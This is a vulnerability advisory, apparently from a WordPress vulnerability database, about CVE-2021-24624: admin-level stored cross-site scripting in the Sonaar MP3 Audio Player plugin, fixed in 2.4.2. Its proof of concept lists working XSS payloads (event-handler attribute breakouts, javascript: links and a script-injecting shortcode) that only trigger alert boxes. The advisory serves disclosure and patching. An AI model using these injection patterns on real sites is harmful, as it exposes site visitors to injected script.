WordPress Plugin Vulnerabilities

MP3 Audio Player for Music, Radio & Podcast by Sonaar < 2.4.2 - Multiple Admin+ Cross Site Scripting

Description

The plugin does not properly sanitize or escape data in some of its Playlist settings, allowing high privilege users to perform Cross-Site Scripting attacks

Proof of Concept

1) Add playlist with "Optional Call to Action"'s "Label" set to:

" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//

2) Set "Optional Call to Action" and "External Links Button"'s "Link URL" to:

javascript:alert(origin)

3) Post this shortcode:
[sonaar_audioplayer play-latest="a" scrollbar='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1+origin)//' playlist_title='" style="animation-name:twentytwentyone-close-button-transition" onanimationstart="alert(2+origin)//' titletag_playlist='script src="data:text/javascript,alert(3+origin)" ']

Affects Plugins

Plugin icon
mp3-music-player-by-sonaar
Fixed in 2.4.2

References

CVE
CVE-2021-24624

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
2.7 (low)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
d79d2f6a-257a-4c9e-b971-9837abd4211c

Timeline

Publicly Published
2021-10-04 (about 2 years ago)
Added
2021-10-04 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)

Other

Published
Title
Published
2023-10-18
Title
WP Simple HTML Sitemap < 2.6 - Contributor+ Stored XSS
Published
2022-07-19
Title
Testimonials <= 3.0.1 - Contributor+ Stored Cross-Site Scripting
Published
2024-03-27
Title
Social Media Share Buttons < 2.8.9 - Admin+ Stored XSS via settings
Published
2024-02-20
Title
Buttons Shortcode and Widget <= 1.16 - Stored XSS via shortcode
Published
2014-08-01
Title
Better WP Security 3.6.3 - Online Backup Storage current_time Function Brute Force Disclosure